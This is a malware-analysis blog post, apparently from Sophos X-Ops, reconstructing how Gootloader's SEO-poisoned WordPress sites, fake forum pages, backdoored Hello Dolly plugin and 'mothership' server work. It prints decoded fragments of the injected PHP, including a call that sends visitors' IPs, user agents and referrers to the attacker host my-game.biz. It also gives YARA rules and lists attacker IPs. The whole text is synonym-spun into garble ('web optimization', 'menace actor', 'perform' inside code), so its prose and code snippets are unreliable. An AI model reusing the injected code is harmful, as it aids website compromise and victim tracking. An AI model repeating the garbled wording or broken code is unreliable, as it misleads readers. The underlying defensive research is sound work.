February 12, 2025

The Gootloader malware household makes use of a particular type of social engineering to contaminate computer systems: Its creators lure individuals to go to compromised, legit WordPress web sites utilizing hijacked Google search outcomes, current the guests to those websites with a simulated on-line message board, and hyperlink to the malware from a simulated “dialog” the place a pretend customer asks a pretend web site admin the precise query that the sufferer was looking for a solution to.

Many of the an infection course of is pushed by code that runs on the compromised WordPress server  and one other server we now have beforehand named “the mothership” that orchestrates an elaborate and complicated dance to dynamically produce a web page that seemingly solutions the precise query you’re asking. Gootloader’s operators make behind the scenes, virtually unnoticeable adjustments to the compromised WordPress websites that trigger these websites to load the additional content material from the mothership.

Each facet of this course of is obfuscated to such a level that even the homeowners of the compromised WordPress pages typically can’t determine the modifications in their very own web site or set off the Gootloader code to run once they go to their very own pages. On the identical time, except you management one of many affected WordPress websites, it may be very tough (if not unimaginable) to come up with this code to check it: The modified WordPress database entries and PHP scripts that comprise Gootloader reside solely on the compromised server, the place safety researchers usually can’t entry them (barring bodily or shell entry to the server, itself).

Sophos X-Ops has beforehand reported on varied features of Gootloader. Nonetheless, Sophos X-Ops has reconstructed how Gootloader’s server-side operations perform, utilizing breadcrumbs and clues left by each the menace actors (and by different safety researchers) revealed in open-source instruments across the web. We now have pulled this collective information collectively into this report.

On this put up, I’ll clarify how I used to be in a position to reconstruct how the malicious web optimization works; how the touchdown web page code on the preliminary, compromised web site validates guests then redirects a few of them to a second web site; how the Gootloader operators use the second web site to generate a realistic-looking message board dynamically; how the multi-stage an infection course of works; and the way all of those elements are orchestrated by a “mothership” server, managed by Gootloader’s operators, to regulate who will get assaults, and which guests get bounced again to Google’s homepage.

Gootloader’s poisoned web optimization

A list of Gootloader JScript filenames, which correspond to the search query that led victims to download them
An inventory of Gootloader JScript filenames, which correspond to the search question that led victims to obtain them

Gootloader has been utilizing a nearly unchanged malicious web optimization methodology for nearly eight years. When we now have carried out menace searching previously, we’ve used our personal telemetry to seek out the important thing phrases Gootloader used to ship a malicious JScript file: Gootloader all the time names these first-stage recordsdata to match the search phrase that led the sufferer into the entice.

Discovering new names for these first-stage downloaders additionally means discovering new phrases the Gootloader operators are utilizing as lures. It was VirusTotal’s stay searching and retrohunting providers that led us to those up to date payloads, although Gootloader’s creators use code obfuscation to an virtually absurd diploma. We needed to give you creating menace searching queries akin to the next Yara rule:

rule gootkit_js_stage1
{
   strings:
          $a1 = /perform .4,60return .1,20 % .0,8(.1,20+.1,20);/
          $a2 = /perform [w]1,14(.1,14,.1,50) return .1,14.substr(.1,10,.1,10);/
          $a3 = /perform [w]1,14(.1,50) return .1,14.size;.1,4/
          $a4 = /perform [w]1,14(.0,40){.0,40;whereas ([w]1,20 < [23][d]3) /
          $b1 = /;WScript.Sleep([d]4,10);/
          $b2 = /perform [w]1,14(.0,40) .0,40;whereas([w]1,20<([w]1,14*[d]1,8))[w]1,14++/
   situation:
          all of ($a*) and any of ($b*)

Whereas this rule was efficient on the time of our analysis, Gootloader’s operators have subsequently modified the JScript to render this search out of date. With a purpose to keep on prime of those adjustments, we would have liked to research newer variations of the closely obfuscated JScript code.

As a part of the obfuscation, the attackers break up the code. Each elementary functionality is carried out in a separate perform, initially that includes randomly generated variables, then later switching to variable names chosen from a dictionary.

Within the instance above, $a1, $a2, and $a3 match capabilities that carried out the elementary duties within the decryptor.

$a1 matches the perform that determines the parity of a quantity, matching this obfuscated kind:

perform dance(anticipate,help,skinny,foot,had)return anticipate % (magnet+magnet);

$a2 matches the perform that returns a substring from a string, matching this obfuscated kind:

perform provide(spoke,seed,your,construct,cost,carry,sat) return spoke.substr(seed,your);

$a3 returns the size of a string, matching this obfuscated kind:

perform verb(consonant) return consonant.size; 

$a4 implements the principle decoder loop: it accommodates the size of the encoded half (someplace between 2000 and 4000 bytes), matching this obfuscated kind:

perform wave(down)in opposition to=kill;gap="";whereas (in opposition to < 2146) spell=trigger(down,in opposition to);gap=cool(gap,spell,in opposition to); in opposition to++; return gap;

The code used lengthy delays to make dynamic evaluation tougher, extending to hours the time wanted to correctly run the code.

Initially, Gootloader used the WScript.Sleep perform (matched by $b1) to create this delay. Over time, Gootloader’s creators changed this with a much less recognizable implementation (matched by $b2), like this perform, which basically increments a counter for a really very long time:

perform string2(evening6) 
        sky0=25;
        whereas(sky0<(evening6*4921))
                sky0++
        

Despite the fact that the code is very obfuscated, understanding the construction of the code enabled us to create the above seemingly unfastened Yara rule – which caught hundreds of first stage downloader scripts with zero false positives.

As soon as we had the unique file names, we had the search phrases. With these, we may discover the touchdown pages: The Gootloader operators had been profitable in manipulating the search outcomes and the compromised touchdown websites, such that they find yourself close to the highest of the search outcomes (even within the first outcome, as within the instance beneath):

Gootloader has poisoned search results in multiple languages, including German, French, and Korean
Gootloader has poisoned search ends in a number of languages, together with German, French, and Korean

How did the malicious pages find yourself on the prime of the search outcomes?

We had been in a position to find out how the malicious web optimization was so efficient by inspecting the HTML supply of the search touchdown pages.

There’s a hidden factor, the identify of which is definitely a server ID, used at many locations within the code (a47ec48 within the following instance). It begins with the letter ‘a’ adopted by 6 hexadecimal characters:

<div id="a47ec48 ">
...
<div><script sort="textual content/javascript"> doc.getElementById("a47ec48 ").model.show="none"; </script>
Source of the Gootkit/Gootloader landing pages reveal a number of different search terms and phrases the threat actors wanted search engines to index. The linked subpages (selected with green) don't actually exist. The injected WordPress code defines a few hooks, one of them is for non-existing pages. This will serve the fake forum discussion, when the victim clicks on the search result
Supply of the Gootloader touchdown pages reveal plenty of totally different search phrases and phrases the menace actors wished search engines like google and yahoo to index. The linked subpages (chosen with inexperienced) don’t truly exist. The injected WordPress code defines a number of hooks, certainly one of them is for non-existing pages. This can serve the pretend discussion board dialogue, when the sufferer clicks on the search outcome

That hidden factor had hyperlinks (chosen with inexperienced) and the matching focused search phrases (chosen with brown):

This hidden factor won’t be seen to human webpage guests. However search engine crawlers see and course of it, which methods the major search engines into treating the web site as if it gives related content material on the poisoned search time period, thus rating the location excessive within the search outcomes.

Compromised touchdown web page code

When safety vendor Sucuri wrote up a blog post about an earlier generation of Gootloader, it included this screenshot:

 A screenshot of the source code from a Gootkit/Goodloader landing page. Image courtesy of Sucuri Research.
A screenshot of the supply code from a Gootkit/Goodloader touchdown web page. Picture courtesy of Sucuri Analysis.

The report (and screenshot) revealed three promising strings:

  • The request: $_GET[‘a55d837’
  • A malicious web domain name: ‘my-game[.]biz’
  • A SQL question (proven on a special screenshot in Sucuri’s weblog): ‘SELECT * FROM backupdb_’

Looking out Google for code fragment $_GET[‘a55d837’ led us to an online decoder page, where the result (now deleted) of another researcher’s query revealed the encoded version of the PHP code used in the malicious web page:

function qwc1() {
    global $wpdb, $table_prefix, $qwc1;
    $qwc2 = explode('.', $_SERVER["x52105x4d117x54105x5f101x44104x52"]);
    if (sizeof($qwc2) == 4) {
        if ($wpdb - > get_var("x53105x4c105x43124x20105x58111x53124x5340x28123x45114x45103x5440x2a40x46122x4f115x20142x61143x6b165x70144x62137".$table_prefix.
                "x6c163x74141x7440x57110x45122x4540x77160x2075x2047".$qwc2[0].
                '|'.$qwc2[1].
                '|'.$qwc2[2].
                "x2751x3b") == 1) {

and the decoded model of that very same script:

perform qwc1() {
    international $wpdb, $table_prefix, $qwc1;
    $qwc2 = explode('.', $_SERVER["REMOTE_ADDR"]);
    if (sizeof($qwc2) == 4) {
        if ($wpdb - > get_var("SELECT EXISTS (SELECT * FROM backupdb_".$table_prefix.
                "lstat WHERE wp = '".$qwc2[0].
                '|'.$qwc2[1].
                '|'.$qwc2[2].
                "');") == 1) {

Whereas it isn’t clear how the code ended up on that web site, the Web by no means forgets: Search engines like google and yahoo discovered and listed this evaluation. This gave us the primary perception at what the injected code of the compromised touchdown pages would appear like.

(Each the evaluation linked above, and one other web page I subsequently discovered on malwaredecoder.com, had been later eliminated by their respective web site homeowners. Search outcomes that reveal ephemeral evaluation pages like these are solely out there for a brief time frame. When you plan to quote supply supplies from websites akin to these, maintain an offline copy of the web page, as a result of they is probably not there once you return.)

At this level we didn’t know precisely how the websites are compromised, however we knew from the report that malicious PHP code is in some way inserted into the WordPress set up.

The search on Virustotal for content material:”SELECT * FROM backupdb_” offers a few recordsdata from a compromised server that include an error message:

<div id="error"><p class="wpdberror"><sturdy>WordPress database error:</sturdy> [Table 'interfree.backupdb_wp_lstat' doesn't exist]<br /><code>SELECT EXISTS (SELECT * FROM backupdb_wp_lstat WHERE wp = '117|50|2');</code></p></div><!DOCTYPE html>

The criminals are probably utilizing the database backupdb_wp_lstat, which should have been faraway from the server throughout a cleanup. We had been looking for this content material on VirusTotal (search time period: content material:”backupdb_wp_lstat”), hoping we’d come upon a database dump. It’s all the time a good suggestion to arrange these guidelines and do further retrohunts, which may reveal different helpful recordsdata or information.

We had been fortunate, and located an archive file containing a SQL dump of the WordPress database from a compromised server on a public malware repository.

The WordPress database dump included this table that contains a set of the first three octets of IP addresses, a block list of IP ranges that cannot revisit the Gootloader website on the same day
The WordPress database dump included this desk that accommodates a set of the primary three octets of IP addresses, a block listing of IP ranges that can’t revisit the Gootloader web site on the identical day

The dumped database accommodates a desk known as backupdb_wp_lstat. Later evaluation decided that this desk accommodates the IP handle blocklist the malicious web site makes use of to forestall repeat visits.

The obfuscated PHP code was additionally viewable within the database dump:

A block of base64-encoded data stored as a variable named $pposte in a WordPress database
A block of base64-encoded information saved as a variable named $pposte in a WordPress database

…as was the injected web optimization poisoning content material, with the j$ok..j$ok marker:

Malicious SEO content phrases embedded in a WordPress database table, linking the site to an Excel spreadsheet converter search query
Malicious web optimization content material phrases embedded in a WordPress database desk, linking the location to an Excel spreadsheet converter search question

Researchers who need to hunt for this identifiable string within the Descriptions property of the malicious touchdown pages can use the regex  /j$ok([0-9]1,10)j$ok/

The "place marker" string appears in the OpenGraph metadata SEO headers of a Gootkit/Gootloader-modified web page
The “place marker” string seems within the OpenGraph metadata web optimization headers of a Gootloader-modified net web page

This marker serves as placeholder for the spot the place Gootloader’s hyperlink to the web page renderer script is inserted. When the Gootloader web page is served up, it excludes the marker from the web page supply.

Nonetheless, the code extracted from the SQL database dump was not precisely the identical as what was proven within the Sucuri weblog. We continued looking for extra examples by pivoting on the C2 server my-game[.]biz, and located a handful of PHP recordsdata referring to that server:

Files that contain references to the Gootloader "mothership" website (screenshot courtesy of VirusTotal)
Information that include references to the Gootloader “mothership” web site (screenshot courtesy of VirusTotal)

The submission identify commented_functions.php seemed promising. Certainly, it turned out to be probably the work of a researcher, analyzing the PHP supply code from the compromised WordPress set up. It was kindly documented intimately, saving us some evaluation time (which additionally helped as a result of we didn’t have all of the elements).

Commented text, preceded with double slashes, documents the Gootkit characteristics of modified web pages
Commented textual content, preceded with double slashes, paperwork the Gootkit traits of modified net pages

We had been ready to make use of the base64 string referenced within the “html” remark above to look VirusTotal, which led us to a (comparatively) just lately uploaded SQL dump.

a WordPress database dump in VirusTotal
a WordPress database dump in VirusTotal

The dump file contained the beforehand referenced base64 blob…

 A SQL dump from a compromised WordPress installation contains base64-encoded elements of the Gootkit/Gootloader modifications
A SQL dump from a compromised WordPress set up accommodates base64-encoded components of the Gootkit/Gootloader modifications

…which, when decoded, output the identical code that was initially revealed by Sucuri:

The decoded base64 data from the WordPress database reveals the PHP script that handles decoding the malicious content for a site visitor
The decoded base64 information from the WordPress database reveals the PHP script that handles decoding the malicious content material for a web site customer

With this in hand, we had larger confidence within the provenance of this malicious code. We additionally recognized  the desk the place Gootloader shops it in a compromised WordPress database. Having positioned the dump of the WordPress database and the PHP code on the web decoder web site, we now have an entire copy of the malicious content material hosted on the compromised touchdown websites.

What’s within the touchdown web page code?

This code accommodates a easy PHP command shell, which the Gootloader attackers can use to keep up entry to compromised pages.

The variable $pposte holds the identify of the parameter that will get executed. If the compromised web site receives an HTTPS POST with that string in it, the code on the web page will decode and execute any base64 encoded instructions it receives, turning right into a bare-bones command shell the attackers can use to keep up management over the server:

A simple command shell Gootkit inserts into the PHP running in a WordPress site the threat actors have comrpomised
A easy command shell Gootloader inserts into the PHP operating in a WordPress web site the menace actors have compromised

At different factors contained in the code, the script defines filters for WordPress occasions, which set off the execution of capabilities based mostly on predefined situations.

For instance, the next perform executes as soon as the attackers have arrange the compromised WordPress atmosphere: the invoked code (referenced as “qvc5”) initializes the backupdb_wp_lstat database desk.

    add_action("wp", "qvc5");

This snippet from the qvc5() perform initializes the backend databases utilized by Gootloader:

if ($table_prefix < > "backupdb_".$qvc4) {
    $table_prefix = "backupdb_".$qvc4;
    wp_cache_flush();
    $qvc5 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST);
    $qvc5 - > set_prefix($table_prefix);

On making ready the requested net web page, the malicious occasion handler hooks construct the request to the “mothership” (a reputation I’ve given to the web site the Gootloader operators use to centrally handle their fleet of compromised blogs). The communication sends the mothership the next parameters of the preliminary request, all in base64 encoded kind:

  • a: Distinctive server ID
  • b: IP handle of the unsuspecting customer
  • c: person agent
  • d: referrer string
if (isset($_GET[$qwc4])) {
   $request = @wp_remote_retrieve_body(@wp_remote_get("http://my-game.biz/index.php?a=".base64_encode($_GET[$qwc4]).
   '&b='.base64_encode($_SERVER["REMOTE_ADDR"]).
    '&c=".base64_encode($_SERVER["HTTP_USER_AGENT"]).
    "&d='.base64_encode(wp_get_referer()), array("timeout" => 120)))

One among Gootloader’s most problematic behaviors is that it solely permits the potential sufferer to go to the location as soon as in a 24-hour interval. It does this by including the originating IP handle of this communication (the handle of the sufferer PC, variable ‘b’ above) to a block listing. The server additionally geofences IP handle ranges, and solely permits requests to originate from particular nations of curiosity to the Gootloader menace actor.  The referrer string (variable ‘d’ above) accommodates the unique search phrases.

This ends in a question that appears like this:

http://my-game.biz/index.php?a=YWFkZTVlZQ&b=ODUuMjE0LjEzMi4xMTc&c=TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg4LjAuNDMyNC4xNTAgU2FmYXJpLzUzNy4zNg&d=Z29vZ2xlLz9xPWNpc2NvX3dwYV9hZ3JlZW1lbnQ

(On this instance, the “&d=” referrer string is the base64-encoded worth of “google/?q=cisco_wpa_agreement”)

Later, we’ll see that the server’s response would be the pretend discussion board web page renderer code.

The mothership sends the pretend discussion board web page

The mothership response accommodates two elements: one accommodates the HTML header components, and the opposite accommodates the web page physique content material. The 2 are delimited within the code by a <sleep> tag.

The header half accommodates a number of components, separated by pipe (“|”) characters. Utilizing what it will get from the mothership, the touchdown web page code will collect the HTML content material:

The portion of the Gootkit code that collects the HTML content of the fake page it will later draw over the top of the compromised website
The portion of the Gootkit code that collects the HTML content material of the pretend web page it would later draw excessive of the compromised web site

The script provides the whole /24 IP handle vary the place the request originated to a 24-hour block listing. Neither the originating laptop, nor any others with the identical preliminary three units of numbers in its IP handle, can get the web page once more for no less than a day. (This was already seen within the SQL database dump):

 The Gootkit code blocks repeat visitors by adding not only the visitor's IP address range to a block list, but the entire class C IPv4 address range on either side of the visitor's address, just for good measure
The Gootkit code blocks repeat guests by including not solely the customer’s IP handle vary to a block listing, however the whole class C IPv4 handle vary on both facet of the customer’s handle, only for good measure

How Gootloader renders the pretend discussion board web page

If the request comes from an IP handle that isn’t on the block listing, the malicious code within the compromised WordPress database takes motion and delivers the bogus message board content material (usually titled merely “Questions And Solutions”) to the customer’s browser.

The Gootkit/Gootloader fake forum page, featuring a "question" and an "answer" that links to the Gootloader JScript first-stage payload
The Gootloader pretend discussion board web page, that includes a “query” and an “reply” that hyperlinks to the Gootloader JScript first-stage payload

The one seen malicious content material within the supply code of a compromised touchdown web page is an easy inserted JavaScript tag. For instance:

https://powerstick.com/main/?ad94610=1174868

Right here, once more, the distinctive key for the contaminated server is used as a parameter assigned to a numeric worth (1174868 within the above instance):

The unique key is linked in a Javascript code snippet embedded in the compromised WordPress server page.
The distinctive secret’s linked in a Javascript code snippet embedded within the compromised WordPress server web page.

This <script> tag will invoke the touchdown web page renderer perform from the code saved within the WordPress database.

If the HTTPS GET request accommodates a question string that features the an infection ID, the handler code sends a request to the mothership and renders the response.

We’re in a position to get the code returned by the mothership by grabbing the pretend touchdown web page HTML supply, and utilizing an online debugger that data the on-the-fly adjustments.

First it deletes the unique content material of the HMTL web page:

A set of commands that deletes from view the original page content on the compromised WordPress server page the visitor lands on
A set of instructions that deletes from view the unique web page content material on the compromised WordPress server web page the customer lands on

…and replaces it with the pretend discussion board textual content…

The replacement content includes the text of the "Questions And Answers" fake forum page
The alternative content material consists of the textual content of the “Questions And Solutions” pretend discussion board web page

…which additionally accommodates the obtain hyperlink for the primary stage JScript payload:

The download link points to a php script hosted on a different server. This link delivers the .js file packed into a Zip archive which comprises the first stage Gootloader payload
The obtain hyperlink factors to a php script hosted on a special server. This hyperlink delivers the .js file packed right into a Zip archive which includes the primary stage Gootloader payload

The outcome will appear like a dialog within the weblog feedback through which somebody “asks” a query similar to the search question handed from the Google referrer textual content, a “response” seems from a person account named Admin with the search time period hotlinked to the primary stage JScript downloader, and a followup “response” from the identical “person” who “requested” the preliminary query, thanking the admin who “answered.”

Your entire dialog is a fiction. It follows this sample in each Gootloader incident.

A Gootkit/Gootloader fake forum page in German. The source code of the page shows the link points to a file named down.php hosted on a completely different server than the one where the page appears. The link marked in red will connect to the server that is hosting the first-stage download JScript.
A Gootloader pretend discussion board web page in German. The supply code of the web page reveals the hyperlink factors to a file named down.php hosted on a very totally different server than the one the place the web page seems. The hyperlink marked in pink will hook up with the server that’s internet hosting the first-stage obtain JScript.

The primary-stage downloader web site

The pretend discussion board web page connects to the primary stage obtain server, the place a PHP script serves the primary stage JScript downloader script.

(We obtained a replica of this script from one other researcher within the safety neighborhood, who needs to stay nameless, below TLP:Crimson restrictions. Whereas we couldn’t use the script we obtained on this weblog put up, we may use traits of the script to hunt for related samples.)

On the server facet, this file is embedded as a big Base64-encoded information blob, with textual content that begins:

<?php $a=base64_decode('ZnVuY3Rpb24...

With this info, we may seek for related scripts, utilizing this Yara rule:

rule gootkit_stage1_dl
   strings:
          $a = "<?php $a=base64_decode('ZnVuY3Rpb24"
    situation:
          all of them

This gave us a handful of different variants of the script, with the principle distinction being the obtain URL:

We noticed two mothership addresses, 5.8.18[.]7 and my-game[.]biz within the samples we studied. On the time we initially researched this, the my-game area resolved to that IP handle (it now resolves elsewhere). Oddly, the compromised touchdown web page code hyperlinks to the area, and the primary stage JScript downloader hyperlinks to the IP handle.

The primary stage obtain script (down.php or be part of.php or about.php or index.php) merely relays the incoming request to the mothership:

The source code of the PHP script that delivers the first stage Gootloader payload
The supply code of the PHP script that delivers the primary stage Gootloader payload

The request despatched to the mothership will return the first-stage downloader JScript packaged in a Zip archive. As a result of it passes the unique referrer string all the way in which to the mothership, it would obtain the unique search phrases, and might return a payload with a file identify matching these search phrases, which is what we’ve noticed occurs.

How Gootloader compromises WordPress servers

Close to the tip of our preliminary analysis, we discovered an necessary piece of details about the probably supply of the preliminary compromise of the internet hosting WordPress servers. As we collect extra info, it’s value revisiting prior research, which can reveal clues that we didn’t know had been associated on the time.

The writeup describes an assault the place attackers positioned a modified copy of the Hello Dolly plugin within the WordPress uploads listing (e.g. wp-content/uploads/), which they then used to provoke the set up of the malicious WordPress content material.

HelloDolly.php has been a inventory plugin, included with the WordPress self-hosted obtain, for a few years. In any case, modifying this code in a comparatively benign plugin, and leaving it in place on the compromised server, permits Gootloader to function in plain sight whereas minimizing the filesystem adjustments which may reveal a compromise to an alert webmaster.

There are a number of methods through which a menace actor may have the ability to place a file right into a WordPress web site: The credentials for the net server might need been phished or stolen; a WordPress element might have had a vulnerability that permitted distant customers to carry out SQL injection or command execution exploits on the host server; the executive WordPress password might need been stolen.

On this case, the writeup accommodates a screenshot:

Screenshot of the modified HelloDolly.php script (courtesy of the Rich Infante blog)
Screenshot of the modified HelloDolly.php script (courtesy of the Wealthy Infante weblog)

We searched VirusTotal for extra of those recordsdata:

content material:"dolly_css"

Whereas we discovered a number of clear, authentic variations of the HelloDolly.php file…

  • 2c5717200729f76b857a8a32608b72fd3c15772dfcc607bebfc3b36f8ab2a499
  • 2c3d2a55349efe8b636350b58181d930a73e0d0ede59dcaadc47d9a56dd15127

…we discovered many extra the place the backdoor code had been injected…

  • 03a46ad7873ddb6663377282640d45e38697e0fdc1512692bcaee3cbba1aa016
  • 1fcc418bdd7d2d40e7f70b9d636735ab760e1044bb76f8c2232bd189e2fd8be7
  • 258cb1d60a000e8e0bb6dc751b3dc14152628d9dd96454a3137d124a132a4e69
  • 5d50a7cf15561f35ed54a2e442c3dfdac1d660dc18375f7e4105f50eec443f27
  • 7bcffa722687055359c600e7a9abf5d57c9758dccf65b288ba2e6f174b43ac57
  • af50c735173326b2af2e2d2b4717590e813c67a65ba664104880dc5d6a58a029

…and we additionally discovered a number of Zips that contained full copies of compromised WordPress installations:

  • 89672c08916dd38d9d4b7f5bbf7f39f919adcaebc7f8bb1ed053cb701005499a

Right here, the malicious HelloDolly PHP script is put in as a WordPress plugin below the trail:

wp-contentpluginsHello_DollyHelloDolly.php
Another format of the modified HelloDolly.php script shows the unique identifier string
One other format of the modified HelloDolly.php script reveals the distinctive identifier string

The malicious PHP recordsdata present the extra code, together with the unique Good day Dolly lyrics. An inserted code will examine the POST request for particular parameters, and if discovered, will execute the submitted set up code.

A variation on the modified HelloDolly.php script
A variation on the Gootloader-modified HelloDolly.php script

We discovered different variations the place the $dolly variables are renamed $wp

The research blog put up summarizes the method like this:

A screenshot that summarizes the modification process Gootloader uses (image courtesy of the Rich Infante blog)
A screenshot that summarizes the modification course of Gootloader makes use of (picture courtesy of the Wealthy Infante weblog)

We discovered these elements within the SQL database dumps, giving us sufficient confidence to determine that this was (no less than) a technique the attackers compromised these legit WordPress websites to show them into distribution servers.

A WordPress database dump contains the same elements that the Rich Infante blog references
A WordPress database dump accommodates the identical components that the Wealthy Infante weblog references

Docking with the mothership

The mothership server performs a central function orchestrating the early phases of the an infection course of: It gives the pretend discussion board content material that the compromised websites show within the goal’s browser, in addition to the primary stage payload.

Sadly, as a result of this has all been maintained on a server that’s immediately managed by the menace actors, no matter supply code it could include will not be out there to researchers.

Disturbingly, since 2018 when Gootloader first appeared on the scene, it has used the identical area, and for many of that point, the area pointed to a lot of the identical IP addresses.

5.8.18[.]7

The my-game[.]biz area resolved to this IP handle for a number of years. Lots of the malicious scripts level immediately at URLs hosted on this IP handle to ship elements of the an infection.

Recognized URLs:

http://5.8.18[.]7/filezzz.php

The preliminary elements of the an infection are recordsdata referred to as Gootkit. They’re often simply PHP scripts that contain a base64-encoded string and a script to decode the information and output it to a variable, akin to this file (variably known as be part of.php or down.php).

The encoded form of a PHP script that delivers the .js payload
The encoded type of a PHP script that delivers the .js payload

We had been additionally in a position to determine a number of Gootkit recordsdata that confer with, or hyperlink to, this IP handle, together with this script, and this script. Each of those recordsdata include error messages that confer with one thing not having the ability to utterly obtain a element.

A screenshot of a file uploaded to VirusTotal shows references to the IP address formerly used to host the Gootkit/Gootloader "mothership" server
A screenshot of a file uploaded to VirusTotal reveals references to the IP handle previously used to host the Gootkit/Gootloader “mothership” server

Apparently, the server-side downloader script was named file_tmp_41.php, which is not like the downloader scripts seen usually. Which will point out this script was an artifact of testing.

If we pivot off of this info, and (for instance) search VirusTotal for content material:”<?php $a=base64_decode(‘ZnVuY3Rpb24″ . The outcome yields additional files, each of which include a URL that we’ve beforehand mentioned:

http[:]//5.8.18.7/filesst.php?a=$i&b=$u&c=$r&d=$h&e=$g

5.8.18[.]159

This was one other handle that my-game[.]biz has resolved to previously. We had been capable of finding another first-stage Gootkit component that hyperlinks on to this IP handle.

91.215.85[.]52

Yet one more IP that has been used to host my-game[.]biz and continues to take action. We discovered nonetheless one other first-stage Gootkit script that hyperlinks to this IP handle.

my-game[.]biz

The positioning is clean now, however the Web Archive reveals an fascinating origin story to this area: In 2014, it was used to host a Russian on-line playing web site. Since 2018, the web page has hosted no different content material however has been linked to the Gootkit/Gootloader malware.

The my-game website as it appeared in 2014, a Russian-language gambling site called "Casino Game Life"
The my-game web site because it appeared in 2014, a Russian-language playing web site known as “On line casino Sport Life”

The one different reference we may discover to the area was a Counter-Strike clan listing courting again greater than 15 years.

The my-game domain that continues to host the Gootkit/Gootloader mothership originally belonged to a German team that played the game Counter-Strike competitively
The my-game area that continues to host the Gootkit/Gootloader mothership initially belonged to a German crew that performed the sport Counter-Strike competitively

The listing lists this web site as the house web page for a bunch of “semi skilled” gamers based mostly in Germany who performed below the deal with #mY-GaMe.

Identify:     #mY-GaMe
Clan-Tag (Kürzel):     #mY-GaMe`
Land (Hauptsitz des Clans):   Deutschlandweit
Ort (Hauptsitz des Clans):    Deutschlandweit
Chief:   pr0nb1tch
ICQ#:     256558686
Homepage: http://www.my-game.biz
Anzahl der Spieler:    10
Artwork der Spielmodi:     Leaguez
Clan-Profil:    Semi-Profi-Clan
Clan sucht neue Spieler:      Ja
Chief: [email protected]


Open-source intelligence reveals so much

With a malware an infection methodology seemingly designed to make it as tough as attainable for researchers to dig in and study the way it works, Gootloader stays one of the pernicious and difficult-to-study threats on the net.

Nonetheless, regardless of most of its code current and operating within different individuals’s WordPress servers, the proliferation of on-line evaluation instruments gives a wealthy pool of alternative to find out how the malware works, and the way its loader delivers payloads. Because of the sources uploaded by quite a lot of totally different analysts and researchers, we’ve been in a position to construct a virtually full image of how the malware operates.

The PHP scripts, embedded JavaScript elements, and downloadable JScript payloads of this an infection are actually nicely understood, and but the malware continues to have an effect, greater than six years after it was first found. Happily, as a result of comparatively sluggish tempo of the malware’s improvement and its comparatively steady internet hosting of the “mothership” server, static and dynamic detections stay efficient.

And a ultimate word about collaborative analysis initiatives. It pays to develop and keep relationships with the malware evaluation and safety analysis neighborhood. For this challenge, we obtained assist from a number of researchers, a few of whom didn’t need to be acknowledged. Our recommendation: When you do this type of work, don’t hesitate to share your findings; you will discover that the hassle you put money into collaboration with colleagues throughout the business will ultimately repay once you want info. We’re grateful for the help and assist we obtained from a number of people.

Acknowledgments

Sophos X-Ops gratefully acknowledges the contribution of Marv Ahlstrom, an web optimization knowledgeable who suggested us about varied features of Gootloader/Gootkit’s malicious web optimization. The creator additionally needs to thank the pseudonymous researchers who use the handles @sS55752750, @SquiblydooBlog, and @GootLoaderSites for his or her help. We additionally acknowledge and are grateful for analysis beforehand revealed by Sucuri and Wealthy Infante. X-Ops researcher Andrew Brandt contributed to this evaluation.

Indicators of compromise

Hashes and other IOCs referenced in this story are listed on the SophosLabs Github.